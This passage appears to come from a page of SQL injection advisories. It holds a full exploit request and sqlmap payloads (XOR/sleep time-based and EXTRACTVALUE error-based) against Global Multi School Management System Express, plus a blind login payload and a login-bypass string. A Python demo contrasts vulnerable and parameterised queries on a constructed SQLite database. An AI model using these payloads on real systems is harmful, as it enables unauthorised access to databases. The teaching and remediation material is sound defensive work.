/>Content-Disposition: form-data; name="login_mobile"<br /><br />4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW<br />-----------------------------395879129218961020344050490865<br />Content-Disposition: form-data; name="login_password"<br /><br />123456<br />-----------------------------395879129218961020344050490865<br />Content-Disposition: form-data; name="action"<br /><br />login<br />-----------------------------395879129218961020344050490865--<br /><br /></code></pre>
<pre><code># Exploit Title: Global - Multi School Management System Express v1.0 - SQL Injection<br /># Date: 2023-08-12<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378<br /># Tested on: Kali Linux & MacOS<br /># CVE: N/A<br /><br />The school_id parameter of the balance report (POST /report/balance, <br />authenticated via the gmsms session cookie) is concatenated into the <br />query. The XOR/sleep probe in the request below delays the response <br />by 6 seconds when it reaches MySQL, and sqlmap additionally confirmed <br />an error-based technique (EXTRACTVALUE), which means database error <br />messages are returned to the client and can carry query results.<br /><br />### Request ###<br /><br />POST /report/balance HTTP/1.1<br />Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw<br />Accept: */*<br />X-Requested-With: XMLHttpRequest<br />Referer: http://localhost<br />Cookie: gmsms=b8d36491f08934ac621b6bc7170eaef18290469f<br />Content-Length: 472<br />Accept-Encoding: gzip,deflate,br<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36<br />Host: localhost<br />Connection: Keep-alive<br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="school_id"<br /><br />0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z<br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="academic_year_id"<br /><br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="group_by"<br /><br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="date_from"<br /><br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="date_to"<br /><br /><br />------------YWJkMTQzNDcw--<br /><br />### Parameter & Payloads ###<br /><br />Parameter: MULTIPART school_id ((custom) POST)<br />Type: error-based<br />Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)<br />Payload: ------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="school_id"<br /><br />0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' AND EXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT (ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx<br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="academic_year_id"<br /><br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="group_by"<br /><br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="date_from"<br /><br /><br />------------YWJkMTQzNDcw<br />Content-Disposition: form-data; name="date_to"<br /><br /><br />------------YWJkMTQzNDcw--<br /><br /></code></pre>
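<p>The three injection findings above (the Fluent CMS login bypass, the Color Prediction Game login and the Global MSMS balance report) come down to the same defect: user input concatenated into the SQL text, so a quote in the input ends the literal and the remainder is parsed as SQL. The block below is an added example, not code from any of the three applications: it builds a constructed in-memory SQLite schema and runs each query in its vulnerable and its parameterised form with the payloads copied from the advisories. SQLite has no SLEEP(), sysdate() or XOR, so the time-based probes are shown as the boolean probes they are built on and are marked as stand-ins; the XOR payload is passed verbatim to show that it reaches the SQL parser.</p>

```python
import sqlite3

# Payloads copied from the advisories above. MySQL's SLEEP()/sysdate() and
# the XOR operator have no SQLite equivalent, so the time-based probes are
# shown as the boolean probes they are built on (marked "stand-in"); the
# quote that breaks out of the string literal is the same in both dialects.
FLUENT_BYPASS = "1' or 1=1 -- -"
COLOR_TRUE = "4334343433' AND 1=1 AND 'PDLW'='PDLW"   # stand-in for ...AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW
COLOR_FALSE = "4334343433' AND 1=2 AND 'PDLW'='PDLW"  # same shape, false condition: the response differs
SCHOOL_XOR = "0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z"  # verbatim; SQLite rejects it, MySQL sleeps 6 s


def make_db():
    """Constructed in-memory schema standing in for the applications' tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, mobile TEXT, password TEXT, role TEXT);
        INSERT INTO users VALUES (1, '4334343433', '123456', 'user'),
                                 (2, '5550001111', 'adminpass', 'admin');
        CREATE TABLE fees(school_id INTEGER, amount INTEGER);
        INSERT INTO fees VALUES (1, 100), (1, 250), (2, 75);
    """)
    return db


def login_vulnerable(db, mobile, password):
    # String interpolation: the attacker's quote ends the literal and the rest is parsed as SQL.
    sql = f"SELECT id, role FROM users WHERE mobile = '{mobile}' AND password = '{password}'"
    return db.execute(sql).fetchall()


def login_parameterized(db, mobile, password):
    # Bound parameters are sent as values; quoting and comment syntax in them is never interpreted.
    sql = "SELECT id, role FROM users WHERE mobile = ? AND password = ?"
    return db.execute(sql, (mobile, password)).fetchall()


def balance_vulnerable(db, school_id):
    # Mimics an application that echoes database errors to the client, the
    # precondition for the error-based (EXTRACTVALUE) technique sqlmap reported.
    sql = f"SELECT SUM(amount) FROM fees WHERE school_id = '{school_id}'"
    try:
        return db.execute(sql).fetchone()[0]
    except sqlite3.OperationalError as exc:
        return f"DB error: {exc}"


def balance_parameterized(db, school_id):
    sql = "SELECT SUM(amount) FROM fees WHERE school_id = ?"
    return db.execute(sql, (school_id,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print("bypass:", login_vulnerable(db, FLUENT_BYPASS, "wrong"))
    print("bypass, bound:", login_parameterized(db, FLUENT_BYPASS, "wrong"))
    print("blind true/false:", login_vulnerable(db, COLOR_TRUE, "123456"),
          login_vulnerable(db, COLOR_FALSE, "123456"))
    print("balance:", balance_vulnerable(db, SCHOOL_XOR), balance_parameterized(db, SCHOOL_XOR))
```

<p>The true/false pair is the whole mechanism behind the blind finding: the response to COLOR_TRUE differs from the response to COLOR_FALSE, and sqlmap merely swaps the constant condition for one that depends on a character of the data it wants to read (with SLEEP as the observable instead of a row). With bound parameters every payload is looked up as a literal mobile number or school id and matches nothing.</p>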